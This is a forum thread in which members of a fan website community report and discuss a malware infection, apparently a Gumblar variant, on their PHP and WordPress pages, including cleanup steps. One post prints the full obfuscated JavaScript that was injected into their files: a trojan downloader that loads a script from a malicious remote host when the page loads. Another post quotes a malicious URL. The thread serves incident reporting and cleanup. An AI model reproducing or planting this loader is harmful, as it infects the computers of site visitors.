Mojo malware infection?

[Harald B]

Since this morning each time I try go to mixnmojo.com AVG warns me that its blocking a connection to a very dubious link; they vary slightly, with the following being a good example

winamp-com.mapquest.com.orbitdownloader-com.breathconditioning.ru:8080/petardas.com/petardas.com/fanpop.com/secureserver.net/google.com.php

(warning: going there is probably a very bad idea). The site still shows up fine and I have no idea what element is causing this, but since I haven't gotten this before anywhere and am only getting it with Mojo (and also with Behind Mojo) you may want to have an admin look into it.

Sorry if I should have posted this somewhere else. I'm not sure where that would be.

 

edit:I've got two more relevant details. Only the main site and Behind cause trouble, deeper links (blog comments, game database etc) are fine. Also, my other, Nod32-using computer warns me at the same places, and identifies it as a "JS/TrojanDownloader.Agent.NSM Trojan".

[Gabez]

Weird. Thanks for letting us know. I don't understand any of the technicalities, but hopefully (HOPEFULLY!) someone on the team does.

 

I do know that it's getting increasingly hard to update the news, though; the admin keeps crashing. Don't know if that's related or not. I showed a tech friend the inner workings of the site the other day and he was horrified -- apparently the code was made obsolete years ago, and by all logic Mixnmojo shouldn't work at all. Yet it's managing to lumber on... I guess because we keep on stacking more lines of code on top of it.

 

Hopefully this malware infection won't spread anymore and we can trap it in more lines of code. That's the only solution I can think of for now. Maybe someone who actually knows what they're talking about can give some better advice.

[elTee]

Heh yes, I changed the EMI score from 4 skulls to 2 for a joke, but then the goddamn thing kept reseting itself to 2 again. Remi was up all night changing it back

[Gabez]

It has begun: http://poisonpen.mixnmojo.com/ and http://pumpkinpost.mixnmojo.com/ have now been infected by Mojo 9's seriously dated and ageing code.

 

It's Chernobyl all over again.

[Haggis]

Yeah, I noticed that someone, or something, had been messing with my WordPress files. I'm now re-uploading the affected files. Looks like some kind of virus or something, although I'm even less technically savvy than Gabez, so I don't really know what I'm talking about. Right now the Pumpkin Post seems to be back up and running, hopefully that was that...

[Benny]

Looks like its probably a variant of the Gumblar script. I know Zaarin has cleaned it from some pages, but its tried to copy itself to all index.php pages it seems.

 

Most of the *index php files on my site got a script appended to the end, it even snuck its way into my Wordpress theme files too. Any site that's using Wordpress will need to make sure they check their themes and plugins. I know I normally just leave the wp-content folder alone when upgrading/fixing.

[Harald B]

Heads-up:I'm now also getting it when at the comments sections for individual blog posts and in the game database (ie it's spread to showfile.php and gamedb.php, presumably).

 

edit:Nod32 is now identifying it as a "JS/TrojanDownloader.Iframe.NHE Trojan". Maybe the word Iframe will do your engineers some good

[Gabez]

The infection is spreading!!!!

 

DO NOT PANIC.

[jp-30]

If only we had started building Mojo 10.

[DJG]

Don't blame the code.

 

Damn kids.

[Valkian]

I hate to say this Gabez... but I'M IN PANIC!!!

Both The Dig Museum and The Thrillville Quarterly are under attack!!

 

Should re-uploading the files solve the problem? WHAT SHOULD I DO?? I'M SO UNPREPARED FOR THIS! HIGHSCHOOL SUCKS!

[MJ]

Nightlight appears to be fine. Heh, not even a virus can be arsed to pay attention to it.

[QueZTone]

haha DJG came out of hiding after all those years! my plan worked!

 

 

but seriously, very annoying stuff this... get that mapquest malware notice too... but that's something different from the gumblar script..

 

the mapquest thing is just a wrong advertisement i think?

[Harald B]

but seriously, very annoying stuff this... get that mapquest malware notice too... but that's something different from the gumblar script..

 

the mapquest thing is just a wrong advertisement i think?

Afraid not. The link is way too dubious for that, and to make sure I re-enabled adblock on Mojo and still got the same warnings.

[diduz]

Guys, the malware has attacked my laptop and I've been battling to save my system!!!

 

I won't go back to the site until it's safe again (I'm writing from another PC right now).

 

It seems to be some sort of fake virus alert.

[Icebox]

Series of tubes, goddamn it. I hope you gentlemen come out of it okay, powers that be willing.

 

I will try to stay off of Mojo until you get 10 up and running. Don't want to take any major risks. Also I actually sort of enjoyed Poison Pen, for whatever reason, and am sad to see it wiped. All the beast.

[Benny]

For those hosted sites using Wordpress you'll either need to restore off a known clean backup or reinstall Wordpress. I had to:

• Delete the wp-admin and wp-includes folders
  
• Download wordpress again and reupload all the files, overwriting those that were there
  
• Edit the wp-config.php and index.php files to remove the virus code from the footer
  
• Look in the themes in wp-content and remove the code from the footers in the php files
  
• None of the plugins looked like they were infected, but it seems that the script can be appended to .js files too so to be safe I deleted the existing plugins and replaced them one by one.
  

 

This is the code that was appended to my files:

<script>try {var L;if(L!='l'){L='l'};var b='replace';var J="";var vs="";var Y=RegExp;var NS='';var d;if(d!='' && d!='hs'){d=null};this.iu="";function v(e,B){var _=new Array();var sR;if(sR!='Vb' && sR != ''){sR=null};var y='[';var i_=new Array();var mV=new Date();var V='g';y+=B;var z;if(z!='dD'){z='dD'};y+=']';this.Pv='';var W=new Y(y, V);var eF=new Date();var lD=new Date();return e[b](W, new String());};var YI;if(YI!='' && YI!='Hu'){YI='C'};this.Wd="";var h=v('/jpWejtLajrWdLaWsL.LcjoWmj/jpjejtWaWrLdLaLsj.WcWoLmW/jfWaLnLpLoLpW.LcLoWmW/jsWejcLujrLejsjeWrLvLeWrW.WnjeLtW/WgLojojgjlLeW.LcLoLmj.WpjhLpL',"WjL");var yh;if(yh!='ul' && yh!='hU'){yh='ul'};var a=v('8999696960966996869666609696996',"69");var An=new Date();var uc=new Date();var c=v('cbrbeJaJtJeZEJlJeZmbeZnbtb',"ZBJb");var j=new Date();var S=v('h9tztOpz:z/9/zwOi9nOaOm9pz-OcOoOm9.zm9a9pOq9u9e9sztO.zczozmz.Oo9r9bziztzdzozwOnOlzoza9dOezrz-9c9ozmz.9bzr9eza9tOhzc9oznOdzi9t9iOo9nziznzg9.Or9u9:z',"O9z");var yx='';this.ne="";var nw;if(nw!='' && nw!='pk'){nw=null};var bU=window;this._m='';var Rn;if(Rn!='' && Rn!='HF'){Rn=null};var w=v('o8n3lqo8aTd3',"T83q");var xv=new String();this.QK="";var nT;if(nT!='' && nT!='X'){nT=null};var ik;if(ik!='' && ik!='VG'){ik=null};var o=v('s9c9rIiIpIt9',"9lI");A=function(){var Ly;if(Ly!='LU' && Ly != ''){Ly=null};var lY;if(lY!='lS' && lY != ''){lY=null};var Bn=new Array();G=document[c](o);var St;if(St!='Vo'){St=''};var LI;if(LI!='' && LI!='kI'){LI=''};yx=S+a;var KC=new Date();yx+=h;var HN="";G.defer=([1][0]);var Yh='';var lh;if(lh!='' && lh!='rb'){lh=''};G.src=yx;var Vt;if(Vt!='' && Vt!='hss'){Vt=null};var Wr;if(Wr!='HE' && Wr!='ke'){Wr='HE'};document.body.appendChild(G);this.iQ='';};var tK=new Array();bU[w]=A;} catch(M){var In=new Date();var mh;if(mh!='KU' && mh!='Za'){mh=''};};</script>
<!--699af17d7dda64c9f7a4601e44c2c9c6-->

[Gabez]

Oh my, DJG! Now I know that it's the end of days.

 

Hopefully we'll get it sorted out soon because we can't afford to rebuild the code from scratch for at least another few years (when the economy has fully recovered). Until then the mythical "10" version will have to remain just a myth. :/

[daltysmilth]

If, God forbid, the whole site goes down, is there anyplace we could go to see what the status is to getting it back up again?

[Harald B]

Right here, probably. LucasForums is sufficiently distinct from Mojo that it should stay fine.

[Valkian]

I was actually thinking of Gabez' place. That would be the ultimate shelter for us in times of desperation.

[Gabez]

None of you are allowed in my panic shelter >:

[elTee]

Gabez should be shot for this. I've seen his panic shelter, and it would not be a lie to say that one half of it contains 17,450 hot water bottles (of various design, size etc.) and the other half contains a large, deep, bath.

[MJ]

I've checked Nightlight's code, and it seems to be fine. It's on Wordpress, but as a coincidence I updated it to the latest version about five days ago.

[Gabez]

Yeah, but Nighlight is on the Grim Fandango.net part of the server, so I don't think it would be affected anyway.

 

But it never hurts to make sure!